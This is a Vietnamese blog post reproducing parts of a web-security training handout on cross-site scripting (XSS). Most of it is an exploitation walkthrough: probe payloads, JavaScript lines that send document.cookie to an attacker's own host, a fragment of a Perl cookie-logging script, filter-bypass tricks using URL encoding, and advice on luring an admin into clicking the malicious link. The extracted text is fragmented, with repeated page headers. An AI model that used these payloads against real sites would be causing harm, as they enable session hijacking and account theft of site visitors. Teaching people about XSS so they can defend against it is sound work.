Monday, April 18, 2016

các lỗ hổng thường gặp trong quản lý website

2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML. Các phương thức XSS: - non-persistent XSS (Reflected XSS) -persistent XSS (Stored XSS) -Dom-Based XSS A. XSS hoạt động như thế n ào? Về cơ bản XSS cũng như SQL Injection hay Source Injection, nó cũng là các yêu cầu (request) được gửi từ các máy client tới server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Nó có thể là một request được gửi từ các form dữ liệu hoặc cũng có thể đó chỉ là các URL như là Code: http://www.example.com/search.cgi?query=alert(''XSS was found !''); Và rất có thể trình duyệt của bạn sẽ hiện lên một thông báo "XSS was found !". Các đoạn mã trong thẻ không hề bị giới hạn bởi chúng hoàn toàn có thể thay thế bằng một file nguồn trên một server khác thông qua thuộc tính src của thẻ . Cũng chính vì lẽ đó mà chúng ta chưa thể lường hết được độ nguy hiểm của các lỗi XSS. Nhưng nếu như các kĩ thuật tấn công khác có thể làm thay đổi Tài liệu nghiên cứu an ninh web – lưu hành nội bộ 13 2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN được dữ liệu nguồn của web server (mã nguồn, cấu trúc, cơ sở dữ liệu) thì XSS chỉ gây tổn hại đối với website ở phía client mà nạn nhân trực tiếp là những người khách duyệt site đó. Tất nhiên đôi khi các hacker cũng sử dụng kĩ thuật này đề deface các website nhưng đó vẫn chỉ tấn công vào bề mặt của website. Thật vậy, XSS là những Client-Side Script, những đoạn mã này sẽ chỉ chạy bởi trình duyệt phía client do đó XSS không làm ảnh hưởng đến hệ thống website nằm trên server. Mục tiêu tấn công của XSS không ai khác chính là những người sử dụng khác của website, khi họ vô tình vào các trang có chứa các đoạn mã nguy hiểm do các hacker để lại họ có thể bị chuyển tới các website kh ác, đặt lại homepage, hay nặng hơn là mất mật khẩu, mất cookie thậm chí máy tính bạn có thể sẽ bị cài các loại virus, backdoor, worm .. B. Khai thác với XSS Nhận biết website bị dính lỗi XSS : Thường thì XSS có thể xảy ra ở chỗ nào mà người dùng có thể nhập dữ liệu vào và sau đó sẽ nhận được 1 cái gì đó .Nên thường chúng ta sẽ kiểm tra ở những login form đầu vào .Khi nhập 1 chuỗi kí tự nào đó mà kết quả của server trả về có dính tới chuỗi mà bạn nhập thì rất có khả năng site bị dính XSS . Tài liệu nghiên cứu an ninh web – lưu hành nội bộ 14 2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN Giả sử đoạn code chèn XSS là : < script>alert(„XSS‟)< /script> vào login form và sau đó nhận đc Popup có chữ XSS thì chắc chắn site đó bị dính XSS Note : 1 số trường hợp bị dính lỗi XSS nhưng ko xuất hiện XSS ---à lúc này phải View source , nếu thấy có < script>alert(„XSS‟)< /script> thì khai thác. Một cách khác là chèn script vào các biến truyền trực tiếp trên address. Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây] Giả sử đoạn code chèn XSS là : < script>alert(„XSS‟)< /script> và cũng nhận đc popup XSS thì site đó cũng bị dính . Khai thác : Thông thường các attacker sử dụng XSS để lấy các thông tin quan trọng : cookie , user name +pass . Ở đây sử dụng XSS để đánh cắp cookie của victim : Cách chèn script : sử dụng Java script . Code : Tài liệu nghiên cứu an ninh web – lưu hành nội bộ 15 2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN javascript:alert(document.cookie) +Dùng file .php: CODE javascript:location="http://hostcuaban/cookie.php?cookie="+(docum ent.cookie) Hàm location để chuyển trình duyệt đến 1 trang khác, lúc đó document.cookie sẽ thay bằng giá trị cookie. Cách exploit: Đầu tiên tạo file cookie.php thế này up lên host của bạn ( host cần hỗ trợ php) Tài liệu nghiên cứu an ninh web – lưu hành nội bộ 16 2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN XSS giúp steal được cookie của victim, khai thác trên trình duyệt như sau: CODE http://sitexss.com/index.php?act=location="http://hostcuaba n.com/cookie.php?cookie="+(document.cookie) Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn Bây giờ chỉ còn việc dụ "Alert" admin vào link, đổi DIACHIDEDUDO.DUDO lai thành site muốn nó vào sau khi cookie đã lưu lại. +Dùng file .asp Tạo 1 file cookie.asp có nội dung như thế này : Sau đó up lên host hỗ trợ asp , và cũng làm tương tự như trên . CODE : window.open("http://www.hostbanupfile.com/cookie.asp?coo kie="+document.cookie) +Dùng file .cgi : #! /usr/bin/perl #steal.cgi by David Endler #Specific to your system $mailprog = ''/usr/sbin/sendmail''; #creat log file open (COOKIES,">>stolen_cookie_file"); #what victim see print " Content-type: text /html \n\n"; Tài liệu nghiên cứu an ninh web – lưu hành nội bộ 17 2 BIS ĐINH TIÊN HOÀNG,DAKAO, QUẬN 1, TPHCM TEL : 38244041– 090 78 79 477 WEBSITE : WWW.ATHENA.EDU.VN print code< /script> thì sẽ bị chặn như sau : Vượt qua cái này bằng cách dùng thẻ đóng để đóng cái kia . Nghĩa là ta chèn cái này vào : < script> < /script> Không cho JAVASCRIPT tồn tại : Trong trường hợp này thì hầu hết các ký tự đặt biệt được nhập vào từ người dùng đều bị lọc , do đó để vượt qua thì hacker phải mã hoá code nhập vào : http://sitebiloi.com/search.cgi?quer...alert%28%27XSS %27%29%7d%3b Chuỗi "%26%7balert%28%27Mask%27%29%7d%3b" chính là {alert(''XSS'')}; đã được mã hoá C. Phát hiện XSS bằng cách nào ? Nếu như các bạn sử dụng các mã nguồn của các chương trình có sẵn bạn có thể tham khảo danh sách các lỗ hổng của chương trình bạn trên các trang web chứa các thông tin về bảo mật như securityfocus.com, securiteam.com,... Tuy nhiên nếu các website được tự viết mã nguồn thì bạn không thể áp dụng phương pháp trên. Trong trường hợp này bạn cần đến các chương trình scanner tự động. Nếu như bạn sử dụng trong môi Tài liệu nghiên cứu an ninh web – lưu hành nội bộ 19

No comments:

Post a Comment

LIÊN HỆ HƯỚNG DẪN DOWNLOAD TÀI LIỆU 0972246583 - 0984985060